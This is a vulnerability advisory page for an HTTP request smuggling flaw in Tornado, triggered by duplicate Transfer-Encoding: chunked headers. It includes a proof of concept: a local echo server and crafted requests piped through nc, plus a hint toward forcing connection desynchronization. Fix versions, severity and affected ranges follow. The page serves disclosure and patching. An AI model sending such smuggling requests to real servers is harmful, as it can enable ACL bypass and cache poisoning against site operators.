Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS03NTNqLW1wbXgtcXE2Z84AA8x8
Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado
Summary
When Tornado receives a request with two Transfer-Encoding: chunked headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. Pound does this.
PoC
- Install Tornado.
- Start a simple Tornado server that echoes each received request's body:
cat << EOF > server.py
import asyncio
import tornado
class MainHandler(tornado.web.RequestHandler):
def post(self):
self.write(self.request.body)
async def main():
tornado.web.Application([(r"/", MainHandler)]).listen(8000)
await asyncio.Event().wait()
asyncio.run(main())
EOF
python3 server.py &
- Send a valid chunked request:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
- Observe that the response is as expected:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1
Z
- Send a request with two
Transfer-Encoding: chunkedheaders:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
- Observe the strange response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0
HTTP/1.1 400 Bad Request
This is because Tornado believes that the request has no message body, so it tries to interpret 1\r\nZ\r\n0\r\n\r\n as its own request, which causes a 400 response. With a little cleverness involving chunk-exts, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.
Impact
Anyone using Tornado behind a proxy that forwards requests containing multiple Transfer-Encoding: chunked headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NTNqLW1wbXgtcXE2Z84AA8x8
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 4 months ago
Updated: 2 months ago
CVSS Score: 5.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Identifiers: GHSA-753j-mpmx-qq6g
References:
- https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g
- https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572
- https://github.com/advisories/GHSA-753j-mpmx-qq6g
Blast Radius: 26.8
Affected Packages
pypi:tornado
Dependent packages: 853Dependent repositories: 113,286
Downloads: 44,805,372 last month
Affected Version Ranges: <= 6.4.0
Fixed in: 6.4.1
All affected versions: 1.1.1, 1.2.1, 2.1.1, 2.2.1, 2.4.1, 3.0.1, 3.0.2, 3.1.1, 3.2.1, 3.2.2, 4.0.1, 4.0.2, 4.2.1, 4.4.1, 4.4.2, 4.4.3, 4.5.1, 4.5.2, 4.5.3, 5.0.1, 5.0.2, 5.1.1, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.3.1, 6.3.2, 6.3.3
All unaffected versions: 6.4.1